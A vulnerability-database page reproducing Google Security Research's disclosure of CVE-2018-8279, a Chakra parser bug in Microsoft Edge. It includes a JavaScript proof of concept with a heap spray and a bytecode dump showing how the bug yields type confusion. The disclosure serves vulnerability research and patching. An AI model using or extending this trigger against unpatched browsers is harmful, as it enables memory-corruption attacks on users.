Vulners
Lucene search
Microsoft Edge Chakra Parameter Scope Parsing Bug
🗓️ 17 Aug 2018 00:00:00Reported by Google Security ResearchType 
packetstorm🔗 packetstormsecurity.com👁 39 Views
| Reporter | Title | Published | Views | Family All 36 |
|---|---|---|---|---|
 | Microsoft Edge Chakra JIT - Scope Parsing Type Confusion Exploit | 17 Aug 201800:00 | – | zdt |
 | CVE-2018-8279 | 17 Aug 201800:00 | – | circl |
 | Microsoft Edge Memory Corruption Vulnerability (CNVD-2018-12884) | 11 Jul 201800:00 | – | cnvd |
 | Microsoft Edge Scripting Engine Memory Corruption (CVE-2018-8279) | 10 Jul 201800:00 | – | checkpoint_advisories |
 | CVE-2018-8279 | 11 Jul 201800:00 | – | cve |
 | CVE-2018-8279 | 11 Jul 201800:00 | – | cvelist |
 | July 10, 2018—KB4338819 (OS Build 17134.165) | 10 Jul 201807:00 | – | mskb |
| July 10, 2018—KB4338825 (OS Build 16299.547) | 10 Jul 201807:00 | – | mskb |
| July 10, 2018—KB4338826 (OS Build 15063.1206) | 10 Jul 201807:00 | – | mskb |
| July 16, 2018—KB4345419 (OS Build 15063.1209) | 10 Jul 201807:00 | – | mskb |
10
`Microsoft Edge: Chakra: Parameter scope parsing bug
CVE-2018-8279
PoC:
async function trigger(a = class b {
[await 1]() {
}
}) {
}
let spray = [];
for (let i = 0; i < 100000; i++) {
spray.push(parseFloat.bind(1, 0x1234, 0x1234, 0x1234, 0x1234));
}
trigger();
The PoC is invalid JavaScript, but Chakra does parse it without any exception and generates incorrect bytecode from that.
Here's the generated bytecode.
Function trigger ( (#1.1), #2) (In0, In1) (size: 36 [34])
18 locals (8 temps from R10), 5 inline cache
Constant Table:
======== =====
R1 LdRoot
R2 LdC_A_I4 int:1
R3 Ld_A (undefined)
R4 LdFalse
Implicit Arg Ins:
======== === ===
R5 ArgIn_A In1
0000 InitUndecl R6
0002 TryCatch x:004c ( 71)
Line 1: a = class b {
Col 24: ^
0005 BrSrNeq_A x:0048 ( 62) R5 R3
000a NewScFunc R13 = b()
000d InitClass R13
0012 ProfiledLdFld R14 = R13.prototype #0 <0>
0016 SetHomeObj R13 R14
001b NewScObjectSimple R9
001d ProfiledStFld R9.value = R2 #1 <1>
0021 ProfiledStFld R9.done = R4 #2 <2>
0025 Yield R9 R9 <<-----------------------------------------------
0028 ResumeYield R15 R9
002b NewScFunc R16 = b.prototype[]()
002e SetComputedNameVar R16 R15
0033 ProfiledLdFld R14 = R13.prototype #0 <0>
0037 InitClassMemberComputedName R14[R15] = R16
003d SetHomeObj R16 R14
0042 InitConst R6 R13
0045 Ld_A R5 R13
0048 Leave
0049 Br x:0074 ( 40)
004c Catch R10
004e Nop
004f ProfiledLdRootFld R11 = root.Promise #4 <4>
0055 ProfiledLdMethodFld R12 = R11.reject #3 <3>
0059 StartCall ArgCount: 2
005c ArgOut_A Out0 = R11
005f ArgOut_A Out1 = R10
0062 ProfiledCallIWithICIndex R12 = R12(ArgCount: 2) <3> <0>
006c Ld_A R0 R12
006f Leave
0070 Br x:0076 ( 3)
0073 Leave
0074 LdUndef R0
Line 5: }
Col 1: ^
0076 Ret
Yield operations shoud not be performed under a try-catch block, but incorrectly generated bytecode allowed it at (a). This will lead to type confusion in the InterpreterStackFrame::OP_ResumeYield method.
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Aug 2018 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.80263